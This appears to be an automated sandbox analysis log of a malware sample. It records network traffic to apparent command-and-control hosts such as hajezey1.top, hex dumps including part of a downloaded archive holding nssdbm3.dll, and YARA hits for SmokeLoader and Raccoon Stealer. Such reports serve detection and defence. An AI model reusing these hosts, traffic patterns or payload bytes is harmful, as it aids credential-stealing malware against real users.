3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:17 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=92Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:19 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:15 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdytesri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: hajezey1.top
                Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Yara detected SmokeLoaderShow sources
                Source: Yara matchFile source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
                Source: 21.exe, 00000010.00000002.389134308.0000000002D3A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud:

                barindex
                Yara detected Raccoon StealerShow sources
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

                System Summary:

                barindex
                .NET source code contains very large array initializationsShow sources
                Source: BBE1.exe.10.dr, ???????????????.csLarge array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
                Source: D8D0.exe.10.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.csLarge array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
                PE file contains section with special charsShow sources
                Source: F1AC.exe.10.drStatic PE information: section name: Cgw(O~.
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56AB40
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B563360
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57ABD8
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B598BE8
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5F23E3
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5EEB8A
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57EBB0
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5FFA2B
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604AEF
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60E2C5
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6132A9
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B562990
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B578840
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B601002
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B55B090
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B6067E2
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B566E30
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B612EF7
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B562D50
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B611D55
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B540D20
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5735D0
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B562430
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B604496
                Source: CAC5.exe.10.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CAC5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: F11E.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: F11E.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: CBF0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                Source: Md0q201V1D.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 39.0.DF3A.exe.ed0000.11.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.0.B096.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 24.2.B096.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.13.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 31.0.DF3A.exe.a40000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                Source: 39.0.DF3A.exe.ed0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
